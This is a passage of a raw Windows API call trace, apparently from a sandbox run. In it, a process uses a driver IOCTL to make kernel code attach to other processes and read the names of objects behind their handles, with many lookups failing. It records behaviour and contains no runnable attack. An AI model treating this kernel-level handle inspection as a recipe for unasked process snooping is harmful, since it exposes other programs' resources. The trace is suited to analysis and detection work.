hHeap=0x320000) returned 1 [0227.266] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.266] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0227.267] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.267] PsAcquireProcessExitSynchronization () returned 0x0 [0227.267] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0227.267] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0227.267] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.267] PsReleaseProcessExitSynchronization () returned 0x2 [0227.267] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0227.267] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.267] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0227.267] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.267] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.267] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.267] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.267] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.267] PsAcquireProcessExitSynchronization () returned 0x0 [0227.267] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0227.267] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0227.267] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.267] PsReleaseProcessExitSynchronization () returned 0x2 [0227.267] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0227.268] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.268] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0227.268] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.268] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x81c) returned 0x0 [0227.268] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.268] PsLookupProcessByProcessId (in: ProcessId=0x81c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.268] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.268] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.268] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.268] PsLookupProcessByProcessId (in: ProcessId=0x81c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.268] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.268] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0227.268] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.268] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.269] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.269] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.269] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.269] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.269] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.269] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.269] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.269] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.269] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.269] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.269] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.269] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.269] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.269] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.269] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.269] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.270] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.270] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.270] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.270] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.270] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.270] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.270] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.270] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.270] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.270] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.270] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.270] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.270] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.270] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.270] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.271] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0x0 [0227.271] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.271] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.271] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.271] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.271] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.271] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.271] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.271] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.271] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.271] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.271] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.271] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.271] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.272] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.272] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.272] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.272] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.272] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.272] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.272] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.272] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.272] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.272] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.272] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.272] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.272] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.273] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.273] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.273] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.273] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.273] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.273] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.273] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.273] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.273] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.273] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.273] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.274] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.274] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.274] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.274] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.274] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.274] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.274] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.274] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.274] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.275] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.275] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.275] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.275] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.275] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.275] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.275] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.275] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.275] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.275] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.275] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.275] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.276] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.276] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.276] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.276] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.276] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.276] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.276] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.276] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.276] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.276] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.276] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.276] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.276] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.276] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.276] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.276] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.276] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.276] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.276] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.276] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.277] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.277] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.277] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.277] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.277] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.277] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.277] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.277] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.277] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.277] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.277] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.277] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.277] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.277] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.277] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.277] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.278] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.278] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.278] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.278] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.278] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0227.278] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.278] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.278] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.278] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.278] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.278] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.278] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, 